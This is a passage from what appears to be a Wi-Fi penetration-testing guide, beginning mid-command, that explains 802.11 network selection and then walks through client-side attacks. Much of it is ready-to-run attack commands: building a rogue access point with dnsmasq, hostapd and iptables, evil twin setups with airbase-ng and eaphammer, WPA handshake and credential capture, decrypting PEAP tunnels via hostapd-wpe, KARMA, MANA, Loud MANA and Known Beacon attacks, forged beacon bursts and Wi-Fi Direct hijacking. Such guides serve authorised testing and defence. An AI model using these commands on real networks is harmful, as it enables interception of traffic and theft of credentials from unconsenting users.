    --essid example-wifi \
    --password bananas \
    --user-list users.txt

Theory of client attacks

Network selection and roaming

  • The 802.11 protocol defines how a station joins an extended service set (ESS), but does not specify criteria for selecting an ESS or an access point (AP) within it.

  • Stations can move between access points that share the same ESSID while maintaining communication between buildings or areas.

  • The protocol requires station authentication for the ESS, but does not require AP authentication for the station.

Preferred Network Lists (PNL)

  • Stations store the ESSID of each wireless network they connect to in their Preferred Network List (PNL), along with network configuration details.

  • PNL is used to automatically connect to known networks, improving the user experience by optimizing the connection process.

Passive scanning

  • Access points periodically broadcast beacon frames announcing their presence and capabilities, including the access point’s ESSID, unless broadcasting is disabled.

  • During passive scanning, stations listen to beacon frames. If the beacon’s ESSID matches the station’s PNL entry, the station can automatically connect to that access point.

  • Knowing a device’s PNL allows it to potentially be exploited by impersonating a known network ESSID, tricking the device into connecting to a rogue access point.

Active probing

  • Active probing involves stations sending probing requests to discover nearby access points and their characteristics.

  • Directed probe requests target a specific ESSID, helping to determine whether a particular network is within range, even if it is a hidden network.

  • Broadcast probe requests have a null SSID field and are sent to all nearby access points, allowing the station to probe any desired network without revealing its PNL content.

A simple access point with redirection to the Internet

Before explaining how to perform more sophisticated attacks, we’ll explain how to simply create an access point and redirect its traffic to an interface connected to the Internet.

Use ifconfig -a to check for a WLAN interface to create an access point and an interface connected to the Internet.

DHCP and DNS

apt-get install dnsmasq #Manages DHCP and DNS

Create a configuration file /etc/dnsmasq.conf:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Then set the IP addresses and routes:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

And then run dnsmasq:

dnsmasq -C /etc/dnsmasq.conf -d

hostapd

apt-get install hostapd

Create the hostapd.conf configuration file:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Stop annoying processes, set monitor mode and run hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Forwarding and Redirection

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil twin

An evil twin attack exploits the way Wi-Fi clients recognise networks, relying primarily on the network name (ESSID), without requiring the base station (access point) to authenticate itself to the client.

Key points:

  • Difficulty Differentiating : Devices have difficulty distinguishing between legitimate and rogue access points when they share the same ESSID and encryption type. Real-world networks often use multiple access points with the same ESSID to seamlessly extend coverage.

  • Client roaming and connection manipulation : The 802.11 protocol allows devices to roam between access points in the same ESS. Attackers can take advantage of this by tricking the device into disconnecting from its current base station and connecting to a rogue one. This can be achieved by offering a stronger signal or disrupting the connection to a legitimate access point using methods such as deauthentication packets or jamming.

  • Challenges in execution: successfully executing an evil twin attack in environments with multiple well-placed access points can be challenging. Deauthenticating one legitimate access point often results in the device connecting to another legitimate access point, unless the attacker can deauthenticate all nearby access points or place the rogue access point strategically.

You can create a very simple Open Evil Twin (without the ability to route traffic to the Internet) by doing:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

You can also create an Evil Twin with eaphammer (note that the interface must NOT be in monitor mode to create evil twins with eaphammer):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Or with Airgeddon: options 5, 6, 7, 8, 9 (inside the Evil Twin attack menu).

Note that by default, if the ESSID in the PNL is saved as WPA protected, the device will not automatically connect to an Open Evil Twin. You can try to DoS the real access point and hope that the user connects manually to your Open Evil Twin, or you can DoS the real access point and use a WPA Evil Twin to capture the handshake (with this method you won’t be able to let the victim connect to you, since you don’t know the PSK, but you can capture the handshake and try to crack it). Some OSes and AVs will warn the user that connecting to an open network is dangerous…

WPA/WPA2 Evil Twin

You can create an Evil Twin using WPA/2 , and if devices are configured to connect to that SSID using WPA/2, they will try to connect. In any case, to complete the 4-way handshake, you also need to know the password that the client will use. If you do not know this, the connection will not be completed.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks

This method is tested on a PEAP connection, but since I’m decrypting an arbitrary TLS tunnel, it should also work with EAP-TTLS

Inside the hostapd-wpe configuration, comment out the line containing dh_file (change dh_file=/etc/hostapd-wpe/certs/dh to #dh_file=/etc/hostapd-wpe/certs/dh). This makes hostapd-wpe exchange keys using RSA instead of DH, so you can decrypt the traffic later if you know the server’s private key.

Now run the Evil Twin with hostapd-wpe and this modified configuration as usual. Also run Wireshark on the interface that performs the Evil Twin attack.

Now or later (once you have captured some authentication attempts) you can add the RSA private key to Wireshark in: Edit –> Preferences –> Protocols –> TLS –> (RSA keys list) Edit…

Add a new entry and fill in the form with the following values: IP address = any, Port = 0, Protocol = data, Key file (select a key file without password protection to avoid problems).

Then look at the new “Decrypted TLS” tab.

KARMA, MANA, Loud MANA and Known Beacons attacks

ESSID and MAC black/white lists

The different types of Media Access Control Filter Lists (MFACLs) and their respective modes and effects on rogue access point (AP) behavior:

MAC based whitelist :

The malicious AP will only respond to probe requests from whitelisted devices, remaining invisible to all others not on the list.

Blacklist based on MAC :

The rogue access point will ignore probe requests from blacklisted devices, effectively making the rogue access point invisible to those specific devices.

Whitelist based on SSID :

A rogue access point will only respond to probe requests for the listed ESSIDs, making it invisible to devices whose Preferred Network Lists (PNLs) do not contain those ESSIDs.

Blacklist based on SSID :

A rogue access point will not respond to requests for specific blacklisted ESSIDs, making it invisible to devices looking for those specific networks.

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

This method allows an attacker to create a malicious access point (AP) that responds to all probe requests from devices seeking to connect to a network. This technique tricks devices into connecting to the attacker’s AP by impersonating the networks the devices are looking for. When a device sends a connection request to this rogue AP, the AP completes the connection, causing the device to mistakenly join the attacker’s network.

MANA

Devices then began to ignore unsolicited probe responses, reducing the effectiveness of the original KARMA attack. However, a new method known as the MANA attack was introduced by Ian de Villiers and Dominic White. This method involves the rogue access point collecting Preferred Network Lists (PNLs) from devices by responding to their broadcast probe requests with network names (SSIDs) previously requested by the devices. This sophisticated attack bypasses defenses against the original KARMA attack by exploiting the way devices remember and prioritize known networks.

The MANA attack works by monitoring both directed and broadcast probe requests from devices. For directed requests, it records the MAC address of the device and the requested network name, adding this information to the list. When a broadcast request is received, the access point responds with information matching any of the networks in the device’s list, prompting the device to connect to the rogue access point.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

Loud MANA attack is an advanced strategy when devices do not use directional probing or when their Preferred Network Lists (PNLs) are unknown to the attacker. It works on the principle that devices in the same zone are likely to share network names in their PNLs. Instead of responding selectively, this attack broadcasts probe responses for each network name (ESSID) found in the combined PNLs of all monitored devices. This broad approach makes it more likely that the device will recognize a known network and attempt to connect to a rogue access point (AP).

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

When a Loud MANA attack might not be enough, a Known Beacon attack offers another approach. This method mimics the connection process by simulating an AP that responds to any network name, cycling through a list of potential ESSIDs taken from a wordlist. This simulates the presence of many networks in the hope of matching an ESSID in the victim’s PNL and prompting a connection attempt to the fake AP. The attack can be enhanced by combining it with the --loud option to attempt to capture devices more aggressively.

Eaphammer implements this attack as a MANA attack in which all ESSIDs in the list are loaded (you can also combine it with --loud to create a Loud MANA + Known Beacons attack):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

The Known Beacon Burst attack involves rapidly broadcasting beacon frames for each ESSID in the supplied list. This creates a dense environment of fake networks, which greatly increases the likelihood of devices connecting to the rogue AP, especially when combined with a MANA attack. This technique uses speed and volume to overwhelm the devices’ network selection mechanisms.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
 --bssid de:ad:be:ef:13:37 \
 --known-essids-file known-s.txt \
 --dst-addr 11:22:33:11:22:33 \
 --burst-count 5

Wi-Fi Direct

Wi-Fi Direct is a protocol that allows devices to connect directly to each other using Wi-Fi without using a traditional wireless access point. This capability is integrated into various Internet of Things (IoT) devices such as printers and TVs, facilitating direct communication between devices. A notable feature of Wi-Fi Direct is that one device assumes the role of an access point, known as the group owner, to manage the connection.

Wi-Fi Direct connections are secured using Wi-Fi Protected Setup (WPS), which supports several secure pairing methods, including:

  • Push Button Configuration (PBC)

  • PIN code entry

  • Near Field Communication (NFC)

These methods, particularly PIN entry, are susceptible to the same vulnerabilities as WPS in traditional Wi-Fi networks, making them targets for similar attack vectors.

EvilDirect Hijacking

EvilDirect Hijacking is an attack specific to Wi-Fi Direct. It mirrors the Evil Twin attack concept, but targets Wi-Fi Direct connections. In this scenario, an attacker impersonates the legitimate owner of the group in order to trick devices into connecting to the malicious entity. This method can be performed using tools such as airbase-ng by specifying the channel, ESSID, and MAC address of the simulated device.
